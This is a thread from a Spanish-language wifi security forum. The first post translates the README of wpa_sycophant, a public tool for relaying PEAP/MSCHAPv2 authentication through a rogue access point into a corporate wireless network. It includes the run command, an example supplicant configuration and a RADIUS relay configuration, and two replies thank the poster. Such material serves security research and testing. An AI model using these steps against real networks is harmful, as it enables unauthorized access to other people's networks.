El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 29-12-2020 16:46:37

sagael
Usuario

Registrado: 19-05-2019
Mensajes: 5

WPA_Sycophant(aclarar no es de mi autoria)

Una herramienta para retransmitir la autenticación de la fase 2 intenta acceder a la red inalámbrica corporativa sin descifrar la contraseña.

Esto fue lanzado como parte de una charla de Defcon 26 y es un componente en el ataque de retransmisión MSCHAP, el otro es Hostapd-Mana con el indicador enable_sycophant .



Soporte actual
PEAP básico usando MSCHAPv2
Cómo
Para utilizar esta técnica, es necesario que ejecute un punto de acceso no autorizado para que un usuario legítimo se conecte a usted para que pueda transmitir el intento de autenticación a Sycophant.

Para hacer esto con hostapd-mana , agrega una bandera. enable_sycophantMana escribirá la primera parte de la respuesta al desafío una vez que el usuario se conecte. Sycophant lo detecta para iniciar el apretón de manos contra el WiFi objetivo.

La ejecución de wpa_sycophant se puede hacer usando el script wpa_sycophant.shy los comandos admitidos actualmente son:

-c para darle un archivo de configuración, sugiero modificar el ejemplo proporcionado.
-i para proporcionar la interfaz a utilizar.
un comando de ejemplo sería:

sudo ./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlp0s20f0u6

Configuración de ejemplo

network={
  ssid="TestingEAP"
  # The SSID you would like to relay and authenticate against. 
  scan_ssid=1
  key_mgmt=WPA-EAP
  # Do not modify
  identity=""
  anonymous_identity=""
  password=""
  # This initialises the variables for me.
  # -------------
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  # Dont want to connect back to ourselves,
  # so add your rogue BSSID here.
  bssid_blacklist=00:14:22:01:23:45
}

No te retrases a ti mismo
Dado que estará ejecutando un AP deshonesto potencialmente cerca de su suplicante, existe la posibilidad de que intente retransmitirse a sí mismo. Para detener esto, verifique el MAC / BSSID de su punto de acceso y agréguelo al bssid_blacklistde su configuración.

Relé remoto
Si desea separar AP y Sycophant para que se ejecuten en hosts separados o si desea utilizar equipos de grado empresarial.

Esto se puede hacer ejecutando MANA en modo solo RADIUS. Esto creará un servidor RADIUS local que retransmitirá la autenticación al Sycophant local. Esto le permite configurar su pícaro para usar ese servidor RADIUS remoto y transmitir credenciales a través de Internet u otras redes.

A continuación se muestra un ejemplo de configuración de servidor RADIUS para MANA con Sycophant habilitado:

i

nterface=<Ethernet Interface>
driver=wired
# If you would like to run on loopback:
#driver=none 

eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=rogue-ca.pem
server_cert=radius.pem
private_key=radius.key
private_key_passwd=

radius_server_clients=hostapd.radius_clients
# Contents of hostapd.radius_clients:
# 0.0.0.0/0 [email protected]

radius_server_auth_port=1812

# -1 = log all messages
logger_syslog=-1
logger_stdout=-1

# 2 = informational messages
logger_syslog_level=1
logger_stdout_level=1

enable_sycophant=1

A continuación, puede utilizar este servidor RADIUS remoto con cualquier AP que admita la autenticación RADIUS.


https://github.com/sensepost/wpa_sycophant


PD:como mencione antes en el titular no es de mi autoria profesional;pero lo coloco en el foro por si alguien no lo conocia

Ultima edición por sagael (29-12-2020 16:49:47)

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 29-12-2020 18:07:47

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,474

Re: WPA_Sycophant(aclarar no es de mi autoria)

Muchas gracias por compartir la información. No era necesario poner en el titulo que no es obra tuya ya que dejaste un hipervínculo hacía la fuente pero tu honestidad te honra.  big_smile
Un saludo

Desconectado

#3 29-12-2020 19:59:07

[email protected]
Usuario

Registrado: 03-12-2020
Mensajes: 24

Re: WPA_Sycophant(aclarar no es de mi autoria)

Pues gran aporte ya que yo no lo conocia. Habra que hecharle un ojo

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
0 33 Ayer 19:26:15 por kcdtv
2 117 Ayer 17:55:10 por Koala
Pegado:
34 21119 23-10-2021 11:17:50 por kcdtv
0 150 22-10-2021 17:12:58 por managuas
1 187 22-10-2021 09:24:04 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Anapolis11
Usuarios registrados conectados: 0
Invitados conectados: 7

Estadisticas de los foros

Número total de usuarios registrados: 2,241
Número total de temas: 1,563
Número total de mensajes: 14,948

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36